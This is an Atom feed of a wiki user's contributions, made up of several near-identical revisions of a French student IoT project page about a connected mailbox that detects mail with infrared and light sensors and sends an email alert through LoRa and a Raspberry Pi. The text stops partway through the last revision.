<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="fr">
		<id>https://projets-ima.plil.fr/mediawiki/api.php?action=feedcontributions&amp;feedformat=atom&amp;user=Rruet</id>
		<title>Wiki de Projets IMA - Contributions de l’utilisateur [fr]</title>
		<link rel="self" type="application/atom+xml" href="https://projets-ima.plil.fr/mediawiki/api.php?action=feedcontributions&amp;feedformat=atom&amp;user=Rruet"/>
		<link rel="alternate" type="text/html" href="https://projets-ima.plil.fr/mediawiki/index.php/Sp%C3%A9cial:Contributions/Rruet"/>
		<updated>2026-05-14T13:37:27Z</updated>
		<subtitle>Contributions de l’utilisateur</subtitle>
		<generator>MediaWiki 1.29.2</generator>

	<entry>
		<id>https://projets-ima.plil.fr/mediawiki/index.php?title=Bo%C3%AEte_aux_lettres_connect%C3%A9e&amp;diff=37524</id>
		<title>Boîte aux lettres connectée</title>
		<link rel="alternate" type="text/html" href="https://projets-ima.plil.fr/mediawiki/index.php?title=Bo%C3%AEte_aux_lettres_connect%C3%A9e&amp;diff=37524"/>
				<updated>2017-01-20T08:43:08Z</updated>
		
		<summary type="html">&lt;p&gt;Rruet : /* Poster */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;==Cahier des charges==&lt;br /&gt;
===Présentation générale du projet===&lt;br /&gt;
====Contexte====&lt;br /&gt;
&lt;br /&gt;
Dans le cadre du module IoT (Internet of Things), nous devons réaliser en 20 heures un prototype d'objet connecté. Cet objet connecté devra répondre à un certain besoin existant. Nous avons décidé de concevoir une boite aux lettres connectée.&lt;br /&gt;
&lt;br /&gt;
====Objectif du projet====&lt;br /&gt;
&lt;br /&gt;
Nous imaginons réaliser un module insérable dans une BAL qui permettrait de détecter la réception d'un courrier ou colis. L'utilisateur serait alors prévenu et cela lui éviterait un déplacement inutile.&lt;br /&gt;
&lt;br /&gt;
Voici un schéma montrant notre vision du prototype :&lt;br /&gt;
&lt;br /&gt;
[[Fichier:bal.png]]&lt;br /&gt;
&lt;br /&gt;
====Description du projet====&lt;br /&gt;
&lt;br /&gt;
Le module serait confectionné à la découpeuse laser du Fabricarium, et sera prévu pour s'insérer dans une BAL normalisée (26cmx26cmx34cm). Il sera équipé de plusieurs capteurs permettant de repérer l'insertion d'un courrier. Il y aura deux systèmes de détections :&lt;br /&gt;
* Un qui détectera l'ouverture de la trappe &lt;br /&gt;
* L'autre qui confirmera qu'il y a bien un courrier/colis dans la BAL.&lt;br /&gt;
&lt;br /&gt;
Dès qu'un objet sera inséré dans la BAL, le module enverra un signal à une Raspberry Pi, qui sera connectée au réseau du domicile de l'utilisateur, via le protocole LoRa. La raspberry enverra ensuite un mail à l'utilisateur pour le prévenir.&lt;br /&gt;
&lt;br /&gt;
====Matériel nécessaire====&lt;br /&gt;
&lt;br /&gt;
Pour ce projet, nous aurons besoin de :&lt;br /&gt;
* Un raspberry Pi &amp;lt;span style=&amp;quot;color:green&amp;quot;&amp;gt;[reçu]&amp;lt;/span&amp;gt; &lt;br /&gt;
* Puce LoRa pour Raspberry &amp;lt;span style=&amp;quot;color:green&amp;quot;&amp;gt;[reçu]&amp;lt;/span&amp;gt; &lt;br /&gt;
* Module µ-controleur + antenne LoRa &amp;lt;span style=&amp;quot;color:green&amp;quot;&amp;gt;[reçu]&amp;lt;/span&amp;gt; &lt;br /&gt;
* 4 LED infrarouges &amp;lt;span style=&amp;quot;color:green&amp;quot;&amp;gt;[reçu]&amp;lt;/span&amp;gt; &lt;br /&gt;
* 4 récepteurs infrarouges &amp;lt;span style=&amp;quot;color:green&amp;quot;&amp;gt;[reçu]&amp;lt;/span&amp;gt; &lt;br /&gt;
* 1 capteur de luminosité &amp;lt;span style=&amp;quot;color:green&amp;quot;&amp;gt;[reçu]&amp;lt;/span&amp;gt; &lt;br /&gt;
* 1m de tube en pvc &amp;lt;span style=&amp;quot;color:blue&amp;quot;&amp;gt;[Remboursé]&amp;lt;/span&amp;gt;&lt;br /&gt;
* contreplaqué pour la découpe de la boîte &amp;lt;span style=&amp;quot;color:blue&amp;quot;&amp;gt;[Remboursé]&amp;lt;/span&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Étapes du projet==&lt;br /&gt;
&lt;br /&gt;
* Conception du circuit µ-controleur + LEDs&lt;br /&gt;
* Conception du boitier du module&lt;br /&gt;
* Communication Raspberry Pi et module via LoRa&lt;br /&gt;
* Envoi du mail d'avis de réception&lt;br /&gt;
* tests&lt;br /&gt;
&lt;br /&gt;
==Description technique du Projet==&lt;br /&gt;
&lt;br /&gt;
Notre objet connecté sera constitué de deux parties distinctes :&lt;br /&gt;
* Une raspberry connectée à Internet (potentiel routeur de l'utilisateur)&lt;br /&gt;
* Le module à insérer dans la BAL&lt;br /&gt;
&lt;br /&gt;
La raspberry aura pour fonction de recevoir, via un module LoRa connecté sur son port série, le signal du module signifiant qu'un courrier a été inséré dans la BAL. Une fois ce signal reçu, elle s'occupera d'envoyer un mail à l'utilisateur pour le prévenir.&lt;br /&gt;
&lt;br /&gt;
Le module dans la BAL sera constitué d'un module LoRa alimenté par une batterie, qui alimentera le capteur de luminosité, les différentes LED émettrices, et récupérera les valeurs en sorties des 4 récepteurs infrarouges. Tant que les récepteurs recevront un signal, le facteur ne sera pas passé. Mais lorsqu'un courrier sera inséré dans la BAL, le capteur de luminosité captera le la lumière passant par la fente de la BAL, et une ou plusieurs connections IR seront coupées. C'est à cet instant que le module LoRa enverra le signal de réception au récepteur connecté à la Raspberry.&lt;br /&gt;
&lt;br /&gt;
Si seul le capteur de luminosité reçoit de la lumière, et que les connections IR restent actives, cela signifiera que seule la fente a été ouverte, mais qu'aucun courrier n'a été livré.&lt;br /&gt;
&lt;br /&gt;
==Suivi de l'avancement du projet==&lt;br /&gt;
===Séance 1===&lt;br /&gt;
&lt;br /&gt;
* Définition du cahier des charges&lt;br /&gt;
* Définition du matériel nécessaires&lt;br /&gt;
* Premier Schéma du prototype&lt;br /&gt;
&lt;br /&gt;
===Séance 2===&lt;br /&gt;
&lt;br /&gt;
* Prise en main des modules LoRa (Adafruits feather m0)&lt;br /&gt;
* Configuration en mode transmetteur pour l'un, et récepteur pour l'autre&lt;br /&gt;
* Communication entre les deux&lt;br /&gt;
* Connexion de la Raspberry Pi à Internet&lt;br /&gt;
* Code pour l'envoi de mail&lt;br /&gt;
* Découpe des pièces du prototype à la découpeuse laser&lt;br /&gt;
* Etude de la pinmap des modules LoRa pour alimentation des LED infrarouges et récepteurs&lt;br /&gt;
* Réflexion quant aux modifications à apporter aux codes des modules LoRa pour l'application souhaitée&lt;br /&gt;
&lt;br /&gt;
===Séance 3===&lt;br /&gt;
* Finalisation du code pour la communication entre modules LoRa&lt;br /&gt;
* Création d'un programme en langage C pour le traitement des informations reçues par l'Arduino&lt;br /&gt;
* Mise en place d'un prototype&lt;br /&gt;
* Branchement du capteur de luminosité&lt;br /&gt;
* Création d'une interface web pour le choix de l'adresse mail et du corps du message envoyé&lt;br /&gt;
* Edition du poster A3&lt;br /&gt;
&lt;br /&gt;
===Séance 4===&lt;br /&gt;
* Optimisation du code des modules LoRa et du code C sur la raspberry&lt;br /&gt;
* montage final du prototype&lt;br /&gt;
* Suite de l'édition du poster A3&lt;br /&gt;
&lt;br /&gt;
===Séance 5===&lt;br /&gt;
* Automatisation du processus sur la Raspberry&lt;br /&gt;
* Connexion de la Raspberry en Wifi automatiquement au démarrage sur un téléphone en partage de connexion pour accès internet durant la démo&lt;br /&gt;
* Développement d'une petite application Android analogue à l'interface web, pour pouvoir régler l'adresse et le corps du message depuis son smartphone&lt;br /&gt;
&lt;br /&gt;
==Poster==&lt;br /&gt;
&lt;br /&gt;
[[Fichier:PosterGr2.png|1000px|thumb|center|Poster de notre BAL connectée]]&lt;br /&gt;
&lt;br /&gt;
==Aperçus des applications==&lt;br /&gt;
&lt;br /&gt;
[[Fichier:web_bal.png|1000px|thumb|center|Aperçu de l'application web]]&lt;br /&gt;
&lt;br /&gt;
[[Fichier:appli.png|500px|thumb|center|Aperçu de l'application mobile]]&lt;/div&gt;</summary>
		<author><name>Rruet</name></author>	</entry>

	<entry>
		<id>https://projets-ima.plil.fr/mediawiki/index.php?title=Bo%C3%AEte_aux_lettres_connect%C3%A9e&amp;diff=37523</id>
		<title>Boîte aux lettres connectée</title>
		<link rel="alternate" type="text/html" href="https://projets-ima.plil.fr/mediawiki/index.php?title=Bo%C3%AEte_aux_lettres_connect%C3%A9e&amp;diff=37523"/>
				<updated>2017-01-20T08:42:21Z</updated>
		
		<summary type="html">&lt;p&gt;Rruet : /* Aperçus des applications */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;==Cahier des charges==&lt;br /&gt;
===Présentation générale du projet===&lt;br /&gt;
====Contexte====&lt;br /&gt;
&lt;br /&gt;
Dans le cadre du module IoT (Internet of Things), nous devons réaliser en 20 heures un prototype d'objet connecté. Cet objet connecté devra répondre à un certain besoin existant. Nous avons décidé de concevoir une boite aux lettres connectée.&lt;br /&gt;
&lt;br /&gt;
====Objectif du projet====&lt;br /&gt;
&lt;br /&gt;
Nous imaginons réaliser un module insérable dans une BAL qui permettrait de détecter la réception d'un courrier ou colis. L'utilisateur serait alors prévenu et cela lui éviterait un déplacement inutile.&lt;br /&gt;
&lt;br /&gt;
Voici un schéma montrant notre vision du prototype :&lt;br /&gt;
&lt;br /&gt;
[[Fichier:bal.png]]&lt;br /&gt;
&lt;br /&gt;
====Description du projet====&lt;br /&gt;
&lt;br /&gt;
Le module serait confectionné à la découpeuse laser du Fabricarium, et sera prévu pour s'insérer dans une BAL normalisée (26cmx26cmx34cm). Il sera équipé de plusieurs capteurs permettant de repérer l'insertion d'un courrier. Il y aura deux systèmes de détections :&lt;br /&gt;
* Un qui détectera l'ouverture de la trappe &lt;br /&gt;
* L'autre qui confirmera qu'il y a bien un courrier/colis dans la BAL.&lt;br /&gt;
&lt;br /&gt;
Dès qu'un objet sera inséré dans la BAL, le module enverra un signal à une Raspberry Pi, qui sera connectée au réseau du domicile de l'utilisateur, via le protocole LoRa. La raspberry enverra ensuite un mail à l'utilisateur pour le prévenir.&lt;br /&gt;
&lt;br /&gt;
====Matériel nécessaire====&lt;br /&gt;
&lt;br /&gt;
Pour ce projet, nous aurons besoin de :&lt;br /&gt;
* Un raspberry Pi &amp;lt;span style=&amp;quot;color:green&amp;quot;&amp;gt;[reçu]&amp;lt;/span&amp;gt; &lt;br /&gt;
* Puce LoRa pour Raspberry &amp;lt;span style=&amp;quot;color:green&amp;quot;&amp;gt;[reçu]&amp;lt;/span&amp;gt; &lt;br /&gt;
* Module µ-controleur + antenne LoRa &amp;lt;span style=&amp;quot;color:green&amp;quot;&amp;gt;[reçu]&amp;lt;/span&amp;gt; &lt;br /&gt;
* 4 LED infrarouges &amp;lt;span style=&amp;quot;color:green&amp;quot;&amp;gt;[reçu]&amp;lt;/span&amp;gt; &lt;br /&gt;
* 4 récepteurs infrarouges &amp;lt;span style=&amp;quot;color:green&amp;quot;&amp;gt;[reçu]&amp;lt;/span&amp;gt; &lt;br /&gt;
* 1 capteur de luminosité &amp;lt;span style=&amp;quot;color:green&amp;quot;&amp;gt;[reçu]&amp;lt;/span&amp;gt; &lt;br /&gt;
* 1m de tube en pvc &amp;lt;span style=&amp;quot;color:blue&amp;quot;&amp;gt;[Remboursé]&amp;lt;/span&amp;gt;&lt;br /&gt;
* contreplaqué pour la découpe de la boîte &amp;lt;span style=&amp;quot;color:blue&amp;quot;&amp;gt;[Remboursé]&amp;lt;/span&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Étapes du projet==&lt;br /&gt;
&lt;br /&gt;
* Conception du circuit µ-controleur + LEDs&lt;br /&gt;
* Conception du boitier du module&lt;br /&gt;
* Communication Raspberry Pi et module via LoRa&lt;br /&gt;
* Envoi du mail d'avis de réception&lt;br /&gt;
* tests&lt;br /&gt;
&lt;br /&gt;
==Description technique du Projet==&lt;br /&gt;
&lt;br /&gt;
Notre objet connecté sera constitué de deux parties distinctes :&lt;br /&gt;
* Une raspberry connectée à Internet (potentiel routeur de l'utilisateur)&lt;br /&gt;
* Le module à insérer dans la BAL&lt;br /&gt;
&lt;br /&gt;
La raspberry aura pour fonction de recevoir, via un module LoRa connecté sur son port série, le signal du module signifiant qu'un courrier a été inséré dans la BAL. Une fois ce signal reçu, elle s'occupera d'envoyer un mail à l'utilisateur pour le prévenir.&lt;br /&gt;
&lt;br /&gt;
Le module dans la BAL sera constitué d'un module LoRa alimenté par une batterie, qui alimentera le capteur de luminosité, les différentes LED émettrices, et récupérera les valeurs en sorties des 4 récepteurs infrarouges. Tant que les récepteurs recevront un signal, le facteur ne sera pas passé. Mais lorsqu'un courrier sera inséré dans la BAL, le capteur de luminosité captera le la lumière passant par la fente de la BAL, et une ou plusieurs connections IR seront coupées. C'est à cet instant que le module LoRa enverra le signal de réception au récepteur connecté à la Raspberry.&lt;br /&gt;
&lt;br /&gt;
Si seul le capteur de luminosité reçoit de la lumière, et que les connections IR restent actives, cela signifiera que seule la fente a été ouverte, mais qu'aucun courrier n'a été livré.&lt;br /&gt;
&lt;br /&gt;
==Suivi de l'avancement du projet==&lt;br /&gt;
===Séance 1===&lt;br /&gt;
&lt;br /&gt;
* Définition du cahier des charges&lt;br /&gt;
* Définition du matériel nécessaires&lt;br /&gt;
* Premier Schéma du prototype&lt;br /&gt;
&lt;br /&gt;
===Séance 2===&lt;br /&gt;
&lt;br /&gt;
* Prise en main des modules LoRa (Adafruits feather m0)&lt;br /&gt;
* Configuration en mode transmetteur pour l'un, et récepteur pour l'autre&lt;br /&gt;
* Communication entre les deux&lt;br /&gt;
* Connexion de la Raspberry Pi à Internet&lt;br /&gt;
* Code pour l'envoi de mail&lt;br /&gt;
* Découpe des pièces du prototype à la découpeuse laser&lt;br /&gt;
* Etude de la pinmap des modules LoRa pour alimentation des LED infrarouges et récepteurs&lt;br /&gt;
* Réflexion quant aux modifications à apporter aux codes des modules LoRa pour l'application souhaitée&lt;br /&gt;
&lt;br /&gt;
===Séance 3===&lt;br /&gt;
* Finalisation du code pour la communication entre modules LoRa&lt;br /&gt;
* Création d'un programme en langage C pour le traitement des informations reçues par l'Arduino&lt;br /&gt;
* Mise en place d'un prototype&lt;br /&gt;
* Branchement du capteur de luminosité&lt;br /&gt;
* Création d'une interface web pour le choix de l'adresse mail et du corps du message envoyé&lt;br /&gt;
* Edition du poster A3&lt;br /&gt;
&lt;br /&gt;
===Séance 4===&lt;br /&gt;
* Optimisation du code des modules LoRa et du code C sur la raspberry&lt;br /&gt;
* montage final du prototype&lt;br /&gt;
* Suite de l'édition du poster A3&lt;br /&gt;
&lt;br /&gt;
===Séance 5===&lt;br /&gt;
* Automatisation du processus sur la Raspberry&lt;br /&gt;
* Connexion de la Raspberry en Wifi automatiquement au démarrage sur un téléphone en partage de connexion pour accès internet durant la démo&lt;br /&gt;
* Développement d'une petite application Android analogue à l'interface web, pour pouvoir régler l'adresse et le corps du message depuis son smartphone&lt;br /&gt;
&lt;br /&gt;
==Poster==&lt;br /&gt;
&lt;br /&gt;
[[Fichier:PosterGr2.png]]&lt;br /&gt;
&lt;br /&gt;
==Aperçus des applications==&lt;br /&gt;
&lt;br /&gt;
[[Fichier:web_bal.png|1000px|thumb|center|Aperçu de l'application web]]&lt;br /&gt;
&lt;br /&gt;
[[Fichier:appli.png|500px|thumb|center|Aperçu de l'application mobile]]&lt;/div&gt;</summary>
		<author><name>Rruet</name></author>	</entry>

	<entry>
		<id>https://projets-ima.plil.fr/mediawiki/index.php?title=Fichier:Appli.png&amp;diff=37522</id>
		<title>Fichier:Appli.png</title>
		<link rel="alternate" type="text/html" href="https://projets-ima.plil.fr/mediawiki/index.php?title=Fichier:Appli.png&amp;diff=37522"/>
				<updated>2017-01-20T08:40:29Z</updated>
		
		<summary type="html">&lt;p&gt;Rruet : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;/div&gt;</summary>
		<author><name>Rruet</name></author>	</entry>

	<entry>
		<id>https://projets-ima.plil.fr/mediawiki/index.php?title=Fichier:Web_bal.png&amp;diff=37521</id>
		<title>Fichier:Web bal.png</title>
		<link rel="alternate" type="text/html" href="https://projets-ima.plil.fr/mediawiki/index.php?title=Fichier:Web_bal.png&amp;diff=37521"/>
				<updated>2017-01-20T08:38:43Z</updated>
		
		<summary type="html">&lt;p&gt;Rruet : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;/div&gt;</summary>
		<author><name>Rruet</name></author>	</entry>

	<entry>
		<id>https://projets-ima.plil.fr/mediawiki/index.php?title=Bo%C3%AEte_aux_lettres_connect%C3%A9e&amp;diff=37520</id>
		<title>Boîte aux lettres connectée</title>
		<link rel="alternate" type="text/html" href="https://projets-ima.plil.fr/mediawiki/index.php?title=Bo%C3%AEte_aux_lettres_connect%C3%A9e&amp;diff=37520"/>
				<updated>2017-01-20T08:38:14Z</updated>
		
		<summary type="html">&lt;p&gt;Rruet : /* Aperçus des applications */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;==Cahier des charges==&lt;br /&gt;
===Présentation générale du projet===&lt;br /&gt;
====Contexte====&lt;br /&gt;
&lt;br /&gt;
Dans le cadre du module IoT (Internet of Things), nous devons réaliser en 20 heures un prototype d'objet connecté. Cet objet connecté devra répondre à un certain besoin existant. Nous avons décidé de concevoir une boite aux lettres connectée.&lt;br /&gt;
&lt;br /&gt;
====Objectif du projet====&lt;br /&gt;
&lt;br /&gt;
Nous imaginons réaliser un module insérable dans une BAL qui permettrait de détecter la réception d'un courrier ou colis. L'utilisateur serait alors prévenu et cela lui éviterait un déplacement inutile.&lt;br /&gt;
&lt;br /&gt;
Voici un schéma montrant notre vision du prototype :&lt;br /&gt;
&lt;br /&gt;
[[Fichier:bal.png]]&lt;br /&gt;
&lt;br /&gt;
====Description du projet====&lt;br /&gt;
&lt;br /&gt;
Le module serait confectionné à la découpeuse laser du Fabricarium, et sera prévu pour s'insérer dans une BAL normalisée (26cmx26cmx34cm). Il sera équipé de plusieurs capteurs permettant de repérer l'insertion d'un courrier. Il y aura deux systèmes de détections :&lt;br /&gt;
* Un qui détectera l'ouverture de la trappe &lt;br /&gt;
* L'autre qui confirmera qu'il y a bien un courrier/colis dans la BAL.&lt;br /&gt;
&lt;br /&gt;
Dès qu'un objet sera inséré dans la BAL, le module enverra un signal à une Raspberry Pi, qui sera connectée au réseau du domicile de l'utilisateur, via le protocole LoRa. La raspberry enverra ensuite un mail à l'utilisateur pour le prévenir.&lt;br /&gt;
&lt;br /&gt;
====Matériel nécessaire====&lt;br /&gt;
&lt;br /&gt;
Pour ce projet, nous aurons besoin de :&lt;br /&gt;
* Un raspberry Pi &amp;lt;span style=&amp;quot;color:green&amp;quot;&amp;gt;[reçu]&amp;lt;/span&amp;gt; &lt;br /&gt;
* Puce LoRa pour Raspberry &amp;lt;span style=&amp;quot;color:green&amp;quot;&amp;gt;[reçu]&amp;lt;/span&amp;gt; &lt;br /&gt;
* Module µ-controleur + antenne LoRa &amp;lt;span style=&amp;quot;color:green&amp;quot;&amp;gt;[reçu]&amp;lt;/span&amp;gt; &lt;br /&gt;
* 4 LED infrarouges &amp;lt;span style=&amp;quot;color:green&amp;quot;&amp;gt;[reçu]&amp;lt;/span&amp;gt; &lt;br /&gt;
* 4 récepteurs infrarouges &amp;lt;span style=&amp;quot;color:green&amp;quot;&amp;gt;[reçu]&amp;lt;/span&amp;gt; &lt;br /&gt;
* 1 capteur de luminosité &amp;lt;span style=&amp;quot;color:green&amp;quot;&amp;gt;[reçu]&amp;lt;/span&amp;gt; &lt;br /&gt;
* 1m de tube en pvc &amp;lt;span style=&amp;quot;color:blue&amp;quot;&amp;gt;[Remboursé]&amp;lt;/span&amp;gt;&lt;br /&gt;
* contreplaqué pour la découpe de la boîte &amp;lt;span style=&amp;quot;color:blue&amp;quot;&amp;gt;[Remboursé]&amp;lt;/span&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Étapes du projet==&lt;br /&gt;
&lt;br /&gt;
* Conception du circuit µ-controleur + LEDs&lt;br /&gt;
* Conception du boitier du module&lt;br /&gt;
* Communication Raspberry Pi et module via LoRa&lt;br /&gt;
* Envoi du mail d'avis de réception&lt;br /&gt;
* tests&lt;br /&gt;
&lt;br /&gt;
==Description technique du Projet==&lt;br /&gt;
&lt;br /&gt;
Notre objet connecté sera constitué de deux parties distinctes :&lt;br /&gt;
* Une raspberry connectée à Internet (potentiel routeur de l'utilisateur)&lt;br /&gt;
* Le module à insérer dans la BAL&lt;br /&gt;
&lt;br /&gt;
La raspberry aura pour fonction de recevoir, via un module LoRa connecté sur son port série, le signal du module signifiant qu'un courrier a été inséré dans la BAL. Une fois ce signal reçu, elle s'occupera d'envoyer un mail à l'utilisateur pour le prévenir.&lt;br /&gt;
&lt;br /&gt;
Le module dans la BAL sera constitué d'un module LoRa alimenté par une batterie, qui alimentera le capteur de luminosité, les différentes LED émettrices, et récupérera les valeurs en sorties des 4 récepteurs infrarouges. Tant que les récepteurs recevront un signal, le facteur ne sera pas passé. Mais lorsqu'un courrier sera inséré dans la BAL, le capteur de luminosité captera le la lumière passant par la fente de la BAL, et une ou plusieurs connections IR seront coupées. C'est à cet instant que le module LoRa enverra le signal de réception au récepteur connecté à la Raspberry.&lt;br /&gt;
&lt;br /&gt;
Si seul le capteur de luminosité reçoit de la lumière, et que les connections IR restent actives, cela signifiera que seule la fente a été ouverte, mais qu'aucun courrier n'a été livré.&lt;br /&gt;
&lt;br /&gt;
==Suivi de l'avancement du projet==&lt;br /&gt;
===Séance 1===&lt;br /&gt;
&lt;br /&gt;
* Définition du cahier des charges&lt;br /&gt;
* Définition du matériel nécessaires&lt;br /&gt;
* Premier Schéma du prototype&lt;br /&gt;
&lt;br /&gt;
===Séance 2===&lt;br /&gt;
&lt;br /&gt;
* Prise en main des modules LoRa (Adafruits feather m0)&lt;br /&gt;
* Configuration en mode transmetteur pour l'un, et récepteur pour l'autre&lt;br /&gt;
* Communication entre les deux&lt;br /&gt;
* Connexion de la Raspberry Pi à Internet&lt;br /&gt;
* Code pour l'envoi de mail&lt;br /&gt;
* Découpe des pièces du prototype à la découpeuse laser&lt;br /&gt;
* Etude de la pinmap des modules LoRa pour alimentation des LED infrarouges et récepteurs&lt;br /&gt;
* Réflexion quant aux modifications à apporter aux codes des modules LoRa pour l'application souhaitée&lt;br /&gt;
&lt;br /&gt;
===Séance 3===&lt;br /&gt;
* Finalisation du code pour la communication entre modules LoRa&lt;br /&gt;
* Création d'un programme en langage C pour le traitement des informations reçues par l'Arduino&lt;br /&gt;
* Mise en place d'un prototype&lt;br /&gt;
* Branchement du capteur de luminosité&lt;br /&gt;
* Création d'une interface web pour le choix de l'adresse mail et du corps du message envoyé&lt;br /&gt;
* Edition du poster A3&lt;br /&gt;
&lt;br /&gt;
===Séance 4===&lt;br /&gt;
* Optimisation du code des modules LoRa et du code C sur la raspberry&lt;br /&gt;
* montage final du prototype&lt;br /&gt;
* Suite de l'édition du poster A3&lt;br /&gt;
&lt;br /&gt;
===Séance 5===&lt;br /&gt;
* Automatisation du processus sur la Raspberry&lt;br /&gt;
* Connexion de la Raspberry en Wifi automatiquement au démarrage sur un téléphone en partage de connexion pour accès internet durant la démo&lt;br /&gt;
* Développement d'une petite application Android analogue à l'interface web, pour pouvoir régler l'adresse et le corps du message depuis son smartphone&lt;br /&gt;
&lt;br /&gt;
==Poster==&lt;br /&gt;
&lt;br /&gt;
[[Fichier:PosterGr2.png]]&lt;br /&gt;
&lt;br /&gt;
==Aperçus des applications==&lt;br /&gt;
&lt;br /&gt;
[[Fichier:web_bal.png]]&lt;br /&gt;
&lt;br /&gt;
[[Fichier:appli.png]]&lt;/div&gt;</summary>
		<author><name>Rruet</name></author>	</entry>

	<entry>
		<id>https://projets-ima.plil.fr/mediawiki/index.php?title=Bo%C3%AEte_aux_lettres_connect%C3%A9e&amp;diff=37519</id>
		<title>Boîte aux lettres connectée</title>
		<link rel="alternate" type="text/html" href="https://projets-ima.plil.fr/mediawiki/index.php?title=Bo%C3%AEte_aux_lettres_connect%C3%A9e&amp;diff=37519"/>
				<updated>2017-01-20T08:37:55Z</updated>
		
		<summary type="html">&lt;p&gt;Rruet : /* Poster */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;==Cahier des charges==&lt;br /&gt;
===Présentation générale du projet===&lt;br /&gt;
====Contexte====&lt;br /&gt;
&lt;br /&gt;
Dans le cadre du module IoT (Internet of Things), nous devons réaliser en 20 heures un prototype d'objet connecté. Cet objet connecté devra répondre à un certain besoin existant. Nous avons décidé de concevoir une boite aux lettres connectée.&lt;br /&gt;
&lt;br /&gt;
====Objectif du projet====&lt;br /&gt;
&lt;br /&gt;
Nous imaginons réaliser un module insérable dans une BAL qui permettrait de détecter la réception d'un courrier ou colis. L'utilisateur serait alors prévenu et cela lui éviterait un déplacement inutile.&lt;br /&gt;
&lt;br /&gt;
Voici un schéma montrant notre vision du prototype :&lt;br /&gt;
&lt;br /&gt;
[[Fichier:bal.png]]&lt;br /&gt;
&lt;br /&gt;
====Description du projet====&lt;br /&gt;
&lt;br /&gt;
Le module serait confectionné à la découpeuse laser du Fabricarium, et sera prévu pour s'insérer dans une BAL normalisée (26cmx26cmx34cm). Il sera équipé de plusieurs capteurs permettant de repérer l'insertion d'un courrier. Il y aura deux systèmes de détections :&lt;br /&gt;
* Un qui détectera l'ouverture de la trappe &lt;br /&gt;
* L'autre qui confirmera qu'il y a bien un courrier/colis dans la BAL.&lt;br /&gt;
&lt;br /&gt;
Dès qu'un objet sera inséré dans la BAL, le module enverra un signal à une Raspberry Pi, qui sera connectée au réseau du domicile de l'utilisateur, via le protocole LoRa. La raspberry enverra ensuite un mail à l'utilisateur pour le prévenir.&lt;br /&gt;
&lt;br /&gt;
====Matériel nécessaire====&lt;br /&gt;
&lt;br /&gt;
Pour ce projet, nous aurons besoin de :&lt;br /&gt;
* Un raspberry Pi &amp;lt;span style=&amp;quot;color:green&amp;quot;&amp;gt;[reçu]&amp;lt;/span&amp;gt; &lt;br /&gt;
* Puce LoRa pour Raspberry &amp;lt;span style=&amp;quot;color:green&amp;quot;&amp;gt;[reçu]&amp;lt;/span&amp;gt; &lt;br /&gt;
* Module µ-controleur + antenne LoRa &amp;lt;span style=&amp;quot;color:green&amp;quot;&amp;gt;[reçu]&amp;lt;/span&amp;gt; &lt;br /&gt;
* 4 LED infrarouges &amp;lt;span style=&amp;quot;color:green&amp;quot;&amp;gt;[reçu]&amp;lt;/span&amp;gt; &lt;br /&gt;
* 4 récepteurs infrarouges &amp;lt;span style=&amp;quot;color:green&amp;quot;&amp;gt;[reçu]&amp;lt;/span&amp;gt; &lt;br /&gt;
* 1 capteur de luminosité &amp;lt;span style=&amp;quot;color:green&amp;quot;&amp;gt;[reçu]&amp;lt;/span&amp;gt; &lt;br /&gt;
* 1m de tube en pvc &amp;lt;span style=&amp;quot;color:blue&amp;quot;&amp;gt;[Remboursé]&amp;lt;/span&amp;gt;&lt;br /&gt;
* contreplaqué pour la découpe de la boîte &amp;lt;span style=&amp;quot;color:blue&amp;quot;&amp;gt;[Remboursé]&amp;lt;/span&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Étapes du projet==&lt;br /&gt;
&lt;br /&gt;
* Conception du circuit µ-controleur + LEDs&lt;br /&gt;
* Conception du boitier du module&lt;br /&gt;
* Communication Raspberry Pi et module via LoRa&lt;br /&gt;
* Envoi du mail d'avis de réception&lt;br /&gt;
* tests&lt;br /&gt;
&lt;br /&gt;
==Description technique du Projet==&lt;br /&gt;
&lt;br /&gt;
Notre objet connecté sera constitué de deux parties distinctes :&lt;br /&gt;
* Une raspberry connectée à Internet (potentiel routeur de l'utilisateur)&lt;br /&gt;
* Le module à insérer dans la BAL&lt;br /&gt;
&lt;br /&gt;
La raspberry aura pour fonction de recevoir, via un module LoRa connecté sur son port série, le signal du module signifiant qu'un courrier a été inséré dans la BAL. Une fois ce signal reçu, elle s'occupera d'envoyer un mail à l'utilisateur pour le prévenir.&lt;br /&gt;
&lt;br /&gt;
Le module dans la BAL sera constitué d'un module LoRa alimenté par une batterie, qui alimentera le capteur de luminosité, les différentes LED émettrices, et récupérera les valeurs en sorties des 4 récepteurs infrarouges. Tant que les récepteurs recevront un signal, le facteur ne sera pas passé. Mais lorsqu'un courrier sera inséré dans la BAL, le capteur de luminosité captera le la lumière passant par la fente de la BAL, et une ou plusieurs connections IR seront coupées. C'est à cet instant que le module LoRa enverra le signal de réception au récepteur connecté à la Raspberry.&lt;br /&gt;
&lt;br /&gt;
Si seul le capteur de luminosité reçoit de la lumière, et que les connections IR restent actives, cela signifiera que seule la fente a été ouverte, mais qu'aucun courrier n'a été livré.&lt;br /&gt;
&lt;br /&gt;
==Suivi de l'avancement du projet==&lt;br /&gt;
===Séance 1===&lt;br /&gt;
&lt;br /&gt;
* Définition du cahier des charges&lt;br /&gt;
* Définition du matériel nécessaires&lt;br /&gt;
* Premier Schéma du prototype&lt;br /&gt;
&lt;br /&gt;
===Séance 2===&lt;br /&gt;
&lt;br /&gt;
* Prise en main des modules LoRa (Adafruits feather m0)&lt;br /&gt;
* Configuration en mode transmetteur pour l'un, et récepteur pour l'autre&lt;br /&gt;
* Communication entre les deux&lt;br /&gt;
* Connexion de la Raspberry Pi à Internet&lt;br /&gt;
* Code pour l'envoi de mail&lt;br /&gt;
* Découpe des pièces du prototype à la découpeuse laser&lt;br /&gt;
* Etude de la pinmap des modules LoRa pour alimentation des LED infrarouges et récepteurs&lt;br /&gt;
* Réflexion quant aux modifications à apporter aux codes des modules LoRa pour l'application souhaitée&lt;br /&gt;
&lt;br /&gt;
===Séance 3===&lt;br /&gt;
